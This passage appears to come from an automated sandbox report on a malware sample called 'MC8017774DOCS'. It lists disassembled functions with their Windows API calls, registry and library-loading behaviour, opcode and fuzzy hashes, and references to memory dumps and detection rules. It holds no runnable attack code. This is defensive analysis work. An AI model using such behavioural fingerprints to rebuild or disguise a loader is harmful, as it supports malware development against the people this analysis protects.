                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne
                                                                                                                                                    • API String ID: 1892508949-3732074636
                                                                                                                                                    • Opcode ID: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
                                                                                                                                                    • Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
                                                                                                                                                    • Opcode Fuzzy Hash: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
                                                                                                                                                    • Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E
                                                                                                                                                    Function 00405273 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 004052A2
                                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                                                                                                      • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                    • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                                                                                    • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                                                                                                    • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                                                                                    • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                                                                                                    Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                                                                                      • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,762323A0), ref: 0040535A
                                                                                                                                                      • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 334405425-0
                                                                                                                                                    • Opcode ID: 5475f02f106110a916f15ee9ab206587335882ec0c1efca6123a78a63609b3d2
                                                                                                                                                    • Instruction ID: 589db8f59639f89aa10495d7cc04380c60c8a7cdceb46225d1e949d191b74c22
                                                                                                                                                    • Opcode Fuzzy Hash: 5475f02f106110a916f15ee9ab206587335882ec0c1efca6123a78a63609b3d2
                                                                                                                                                    • Instruction Fuzzy Hash: 51218071D00205AACF20AFA5CE4999E7A70BF04358F74813BF511B51E0DBBD8991DB6A
                                                                                                                                                    Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00401BE7
                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$AllocFree
                                                                                                                                                    • String ID: Call
                                                                                                                                                    • API String ID: 3394109436-1824292864
                                                                                                                                                    • Opcode ID: 913a1641bf1678fd544d2f354cdad38cfe4f2c05cfad93494d599300ab092abb
                                                                                                                                                    • Instruction ID: ae3691a386166457dd68fa0d34360560a99e353b90efe6619b1f582ab4c46bbf
                                                                                                                                                    • Opcode Fuzzy Hash: 913a1641bf1678fd544d2f354cdad38cfe4f2c05cfad93494d599300ab092abb
                                                                                                                                                    • Instruction Fuzzy Hash: 9B219973600100DBDB20EF94DD8595E77A4AB44318735053FF102F32D0DBB8A8909BAD
                                                                                                                                                    Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Enum$CloseValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 397863658-0
                                                                                                                                                    • Opcode ID: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                                                                                                    • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
                                                                                                                                                    • Opcode Fuzzy Hash: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                                                                                                    • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
                                                                                                                                                    Function 6E9B2A74 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1948546556-0
                                                                                                                                                    • Opcode ID: 9fca805e47e3346da069bb4f6cfd40e8b298e1ce21a0c1b748eae4cc8240b298
                                                                                                                                                    • Instruction ID: ad238ad36cd120687bb67b63ab2e0cf39ea52a9db7c0428984e644ee49cb5b09
                                                                                                                                                    • Opcode Fuzzy Hash: 9fca805e47e3346da069bb4f6cfd40e8b298e1ce21a0c1b748eae4cc8240b298
                                                                                                                                                    • Instruction Fuzzy Hash: 04513CB1908614AFDB20DFE4D985B9B777DEF96358F204829E40497290EB38D8829F91
                                                                                                                                                    Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseQueryValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3356406503-0
                                                                                                                                                    • Opcode ID: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                                                                                                    • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
                                                                                                                                                    • Opcode Fuzzy Hash: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                                                                                                    • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
                                                                                                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                                    • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                                                                                                    • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                                                                                                    • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                                                                                                    Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnableShow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1136574915-0
                                                                                                                                                    • Opcode ID: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                                                                                                    • Instruction ID: ed958cdb0af940290ad8e224458c39a91d35accb7d2f19645d781aa9a2f92111
                                                                                                                                                    • Opcode Fuzzy Hash: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                                                                                                    • Instruction Fuzzy Hash: ECE01A72E082008FE764ABA5AA495AD77B4EB91325B20847FE211F11D1DE7858418F6A
                                                                                                                                                    Function 00406671 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                                      • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                                                                                      • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                                                                                                                                      • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2547128583-0
